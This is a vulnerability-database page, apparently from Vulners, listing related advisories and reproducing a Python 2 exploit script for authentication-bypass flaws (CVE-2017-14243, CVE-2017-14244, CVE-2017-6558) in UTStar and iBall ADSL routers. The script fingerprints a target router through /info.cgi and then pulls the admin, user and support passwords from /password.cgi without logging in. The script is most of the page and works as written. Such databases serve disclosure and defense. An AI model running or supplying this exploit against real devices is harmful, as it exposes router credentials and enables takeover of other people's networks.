Vulners
Lucene search
UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass(CVE-2017-14243)
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | iBall Baton 150M Wireless Router - Authentication Bypass Vulnerability | 30 Aug 201700:00 | – | zdt |
| UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass Vulnerability | 18 Sep 201700:00 | – | zdt |
| iBall ADSL2+ Home Router - Authentication Bypass Vulnerability | 18 Sep 201700:00 | – | zdt |
 | iBall Baton ADSL2+ Authentication Bypass Vulnerability | 21 May 201800:00 | – | cnvd |
| UTStar WA3002G4 Authentication Bypass Vulnerability | 21 May 201800:00 | – | cnvd |
 | CVE-2017-14243 | 17 Sep 201719:00 | – | cve |
| CVE-2017-14244 | 17 Sep 201719:00 | – | cve |
| CVE-2017-6558 | 9 Mar 201709:26 | – | cve |
 | CVE-2017-14243 | 17 Sep 201719:00 | – | cvelist |
| CVE-2017-14244 | 17 Sep 201719:00 | – | cvelist |
10
#/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import urllib2
import argparse
import re
from termcolor import colored
def get_response(url):
response = urllib2.urlopen(url)
return response.read()
def get_info(url):
res = get_response(url + '/info.cgi')
if "iB-WRA150N" in res:
print colored('[INF]','green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'
print colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558'
print colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')
get_cred(url)
else:
if "ADSL2+" in res:
print colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'
print colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'
print colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')
else:
if "96338W" in res:
print colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'
print colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'
get_cred(url)
else:
print colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'
print colored('\r\nCompleted!\r\n','green'),
def get_cred(url):
res = get_response(url + '/password.cgi')
matches = re.findall("(?<=\s').*?(?=')", res, re.DOTALL)
print '\nUsernames\tPasswords\n', colored('---------\t----------', 'green')
print 'admin\t\t' + matches[0] + '\nuser\t\t' + matches[1] + '\nsupport\t\t' + matches[2]
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
def display_info():
print colored('\r\n¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦','green')
print colored('¦','green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244 ', colored('¦','green')
print colored('¦','green'), ' Created by: Gem George ' , colored('¦','green')
print colored('¦','green'), ' Website: https://www.techipick.com/ ', colored('¦','green')
print colored('¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦','green')
print "\r\n"
print colored('[SET]','blue'), 'Target URL: ', sys.argv[1]
def main():
if len(sys.argv) != 2:
print 'Wrong argument count\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'
exit()
else:
display_info()
url = sys.argv[1].rstrip('/')
get_info(url)
if __name__ == "__main__":
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Oct 2017 00:00Current
9.2High risk
Vulners AI Score9.2
EPSS0.60326